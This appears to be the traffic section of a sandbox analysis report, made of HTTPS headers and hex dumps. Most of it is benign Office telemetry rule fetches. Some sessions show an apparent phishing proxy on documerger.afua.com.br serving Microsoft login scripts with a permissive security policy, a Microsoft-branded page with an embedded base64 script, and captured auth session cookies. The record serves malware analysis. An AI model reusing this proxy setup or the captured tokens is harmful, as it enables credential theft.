                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:09:53 UTC13649INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32
                                                  Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
                                                  2024-11-27 17:09:53 UTC7166INData Raw: 65 6e 74 2c 68 3d 22 2e 63 73 73 22 3b 63 2e 4f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 69 66 28 21 65 29 7b 74 68 72 6f 77 22 54 68 65 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 63 61 6e 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 72 3f 63 2e 4f 6e 45 72 72 6f 72 28 65 2c 74 29 3a 63 2e 4f 6e 53 75 63 63 65 73 73 28 65 2c 74 29 7d 2c 63 2e 4f 6e 53 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 65 29 7b 74 68 72 6f 77 22 54 68 65 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 63 61 6e 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 69 66 28 75 28 65 29 29 7b 72 65 74 75 72 6e 20 63 2e 4f 6e
                                                  Data Ascii: ent,h=".css";c.On=function(e,r,t){if(!e){throw"The target element must be provided and cannot be null."}r?c.OnError(e,t):c.OnSuccess(e,t)},c.OnSuccess=function(e,t){if(!e){throw"The target element must be provided and cannot be null."}if(u(e)){return c.On


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  49192.168.2.64976513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:54 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:54 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 475
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2BE84FD"
                                                  x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170954Z-174f7845968swgbqhC1EWRmnb40000000x9000000000rrxx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:54 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  50192.168.2.64976613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:54 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:54 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 491
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B98B88612"
                                                  x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170954Z-174f78459688l8rvhC1EWRtzr000000009v0000000009mwc
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:54 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  51192.168.2.64976713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:54 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:54 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 448
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB389F49B"
                                                  x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170954Z-174f7845968n2hr8hC1EWR9cag0000000wyg000000002qpq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:54 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  52192.168.2.64976413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:54 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:54 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 425
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                  ETag: "0x8DC582BBA25094F"
                                                  x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170954Z-174f7845968kdththC1EWRzvxn00000009fg00000000qvw8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:54 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  53192.168.2.64976813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:54 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:54 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 416
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                  ETag: "0x8DC582BAEA4B445"
                                                  x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170954Z-174f7845968ljs8phC1EWRe6en0000000x5g000000001gfp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:54 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  54192.168.2.64976994.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:55 UTC1214OUTGET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                  2024-11-27 17:09:56 UTC1343INHTTP/1.1 200 OK
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Age: 4805971
                                                  Cache-Control: public, max-age=31536000
                                                  Content-MD5: m5bMCfnonQM0ui+8IrUZeg==
                                                  Content-Type: application/x-javascript
                                                  Date: Wed, 27 Nov 2024 17:09:55 GMT
                                                  Etag: 0x8DCE31CBE97473C
                                                  Last-Modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                  Server: ECAcc (muc/337C)
                                                  Vary: Accept-Encoding
                                                  X-Cache: HIT
                                                  x-ms-blob-type: BlockBlob
                                                  x-ms-lease-status: unlocked
                                                  x-ms-request-id: 1a3e6800-b01e-0067-7b39-154432000000
                                                  x-ms-version: 2009-09-19
                                                  content-length: 142378
                                                  Connection: close
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:09:56 UTC15041INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                  Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                  2024-11-27 17:09:56 UTC16384INData Raw: 74 28 22 73 70 61 6e 22 29 3b 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 22 72 65 64 22 2c 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 3d 22 62 6c 75 65 22 2c 65 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 39 39 70 78 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 76 61 72 20 74 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 3b 43 3d 74 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 3d 3d 74 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 2c 41 26 26 21 43 26 26
                                                  Data Ascii: t("span");e.style.borderLeftColor="red",e.style.borderRightColor="blue",e.style.position="absolute",e.style.top="-999px",document.body.appendChild(e);var t=_.getComputedStyle(e);C=t.borderLeftColor===t.borderRightColor,document.body.removeChild(e),A&&!C&&
                                                  2024-11-27 17:09:56 UTC16384INData Raw: 54 49 4c 45 5f 55 52 4c 3a 22 54 69 6c 65 55 72 6c 22 2c 43 49 44 3a 22 43 49 44 22 2c 50 55 49 44 3a 22 50 55 49 44 22 7d 2c 74 2e 44 45 46 41 55 4c 54 5f 43 48 41 4e 4e 45 4c 5f 49 44 3d 22 35 33 65 65 32 38 34 64 2d 39 32 30 61 2d 34 62 35 39 2d 39 64 33 30 2d 61 36 30 33 31 35 62 32 36 38 33 36 22 2c 74 2e 44 45 46 41 55 4c 54 5f 50 52 45 46 45 52 52 45 44 5f 45 58 54 45 4e 53 49 4f 4e 5f 49 44 3d 22 70 70 6e 62 6e 70 65 6f 6c 67 6b 69 63 67 65 67 6b 62 6b 62 6a 6d 68 6c 69 64 65 6f 70 69 6a 69 22 2c 74 2e 57 65 62 4e 61 74 69 76 65 42 72 69 64 67 65 53 75 63 63 65 73 73 3d 22 53 75 63 63 65 73 73 22 2c 74 2e 44 46 50 50 72 65 66 69 78 3d 22 64 66 70 3a 22 2c 74 2e 45 72 72 6f 72 3d 7b 53 5f 4f 4b 3a 22 30 22 2c 49 6e 76 61 6c 69 64 52 65 61 6c 6d 44
                                                  Data Ascii: TILE_URL:"TileUrl",CID:"CID",PUID:"PUID"},t.DEFAULT_CHANNEL_ID="53ee284d-920a-4b59-9d30-a60315b26836",t.DEFAULT_PREFERRED_EXTENSION_ID="ppnbnpeolgkicgegkbkbjmhlideopiji",t.WebNativeBridgeSuccess="Success",t.DFPPrefix="dfp:",t.Error={S_OK:"0",InvalidRealmD
                                                  2024-11-27 17:09:56 UTC16384INData Raw: 3d 6a 51 75 65 72 79 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6f 3d 5b 74 2c 6e 5d 2c 28 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 72 3d 61 29 3f 72 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 72 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 69 29 7d 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 74 79 70 65 6f 66 20 65 20 69 6e 20 43 29 26 26 65 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 28 6e 3d 53 2e 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 61 2c 65 28 29 7d 29 2c 74 29
                                                  Data Ascii: =jQuery),function(a){o=[t,n],(i="function"==typeof(r=a)?r.apply(t,o):r)===undefined||(e.exports=i)}((function(e,t){function n(e,t){return(null===e||typeof e in C)&&e===t}function r(e,t){var n;return function(){n||(n=S.a.setTimeout((function(){n=a,e()}),t)
                                                  2024-11-27 17:09:56 UTC16384INData Raw: 73 2e 71 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 26 26 73 2e 4a 61 7c 7c 28 61 3d 21 6e 29 2c 73 2e 65 64 3d 73 2e 55 2e 63 68 61 6e 67 65 2e 73 6c 69 63 65 28 30 29 2c 73 2e 4a 61 3d 74 3d 21 30 2c 6f 3d 65 2c 63 28 29 7d 2c 73 2e 70 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 7c 7c 28 72 3d 65 2c 73 2e 67 62 28 65 2c 22 62 65 66 6f 72 65 43 68 61 6e 67 65 22 29 29 7d 2c 73 2e 72 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 3d 21 30 7d 2c 73 2e 67 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 73 62 28 72 2c 73 2e 76 28 21 30 29 29 26 26 28 6e 3d 21 30 29 7d 7d 2c 57 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 55 5b 65 5d 26 26 74 68 69 73 2e 55 5b 65 5d 2e 6c 65 6e 67 74 68 7d 2c 42 64 3a 66 75 6e 63 74 69 6f 6e
                                                  Data Ascii: s.qc=function(e,n){n&&s.Ja||(a=!n),s.ed=s.U.change.slice(0),s.Ja=t=!0,o=e,c()},s.pc=function(e){t||(r=e,s.gb(e,"beforeChange"))},s.rc=function(){a=!0},s.gd=function(){s.sb(r,s.v(!0))&&(n=!0)}},Wa:function(e){return this.U[e]&&this.U[e].length},Bd:function
                                                  2024-11-27 17:09:56 UTC16384INData Raw: 66 28 73 5b 53 2e 61 2e 52 28 6e 29 5d 29 7b 76 61 72 20 6f 3d 6e 2e 66 69 72 73 74 43 68 69 6c 64 3b 69 66 28 6f 29 64 6f 7b 69 66 28 31 3d 3d 3d 6f 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 69 2c 61 3d 6e 75 6c 6c 3b 69 66 28 69 3d 6f 2e 66 69 72 73 74 43 68 69 6c 64 29 64 6f 7b 69 66 28 61 29 61 2e 70 75 73 68 28 69 29 3b 65 6c 73 65 20 69 66 28 65 28 69 29 29 7b 76 61 72 20 75 3d 72 28 69 2c 21 30 29 3b 75 3f 69 3d 75 3a 61 3d 5b 69 5d 7d 65 6c 73 65 20 74 28 69 29 26 26 28 61 3d 5b 69 5d 29 7d 77 68 69 6c 65 28 69 3d 69 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 3b 69 66 28 69 3d 61 29 66 6f 72 28 61 3d 6f 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2c 75 3d 30 3b 75 3c 69 2e 6c 65 6e 67 74 68 3b 75 2b 2b 29 61 3f 6e 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28
